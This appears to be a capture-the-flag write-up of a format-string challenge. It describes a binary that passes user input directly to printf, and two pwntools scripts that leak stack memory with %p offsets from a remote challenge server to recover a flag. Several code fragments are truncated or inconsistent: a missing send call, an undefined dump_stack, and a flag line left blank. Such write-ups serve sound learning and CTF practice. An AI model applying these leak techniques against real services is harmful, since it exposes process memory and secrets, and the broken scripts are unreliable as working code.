Tags: format-string pwn 



We get a binary which asks for our name and then prints hello + input.
But in order for the binary to run, a file ```flag.txt``` needs to be created in the working directoy.


Decompiling the binary in *ghidra*, we see a function ```vuln``` where the logic happens.
The decompiled function with some renaming of the variables looks like this:

void vuln(void) {
FILE *flag_file;
long in_FS_OFFSET;
char flag [32];
char name [40];
long local_10;

stack_canary = *(long *)(in_FS_OFFSET + 40);
flag_file = fopen("flag.txt","r");
puts("hello, what\'s your name?");
printf("hello ");
if (stack_canary != *(long *)(in_FS_OFFSET + 40)) {

From this we can see, that the flag is read and stored in the function stack frame.
Also we can see, that our input (_name_) is directly passed to ```printf```, so we got a format string possibility.

With ```%p``` we can print values from the memory and with ```%1$p``` we can also add an offset, to what memory we want to print.

Using this I played a little bit around with offsets, until I saw the hex for the flag in the output.
During the CTF my exploit was pretty simple.

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = "INFO"

context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './readme'

payload = ""

for i in range(1,20):
#p = process( vulnerable )
p = remote('dctf-chall-readme.westeurope.azurecontainer.io', 7481)
p.readuntil('hello, what\'s your name?')
p.readuntil('hello ')
leak = p.read(2048, timeout=1).strip().split(b'.')
for item in leak:
log.info(p64(int(item, 16)))

This already gave me almost the flag. Because I had to extend a closing bracket at the end of it.

After the CTF ended, I extended my Script, to be more efficient, because I could input multiple formats up to 30 characters.
Also I want to have a function to dump the memory, in order to extend the size.
Also the leaked memory was combined and then printed our, this way the flag was more obvious.

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = "INFO"

context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './readme'

payload = ""

def send_payload(fmtstr):
global payload
if len(payload) + len(fmtstr) >= 30:
#p = process( vulnerable )
p = remote('dctf-chall-readme.westeurope.azurecontainer.io', 7481)
p.readuntil('hello, what\'s your name?')
p.readuntil('hello ')
leak = p.read(2048, timeout=1).strip().strip(b';').split(b';')
payload = fmtstr
return leak
payload += fmtstr
return []

def dump(num_bytes_leaked=20):
leaks = []
for i in range(num_bytes_leaked):
stack_leak = map(lambda y: 0 if b'nil' in y else int(y, 16), leaks)
return stack_leak

sl = dump_stack()
slb = b''.join(map(p64, sl))

x = slb[slb.find(b'dctf{'):]
x = x[:(x.find(b'\x00'))]
log.info('flag is: ' + x.decode('ASCII') + '}')

The complete flag was:

Original writeup (https://w0y.at/writeup/2021/05/17/dctf-2021-readme.html).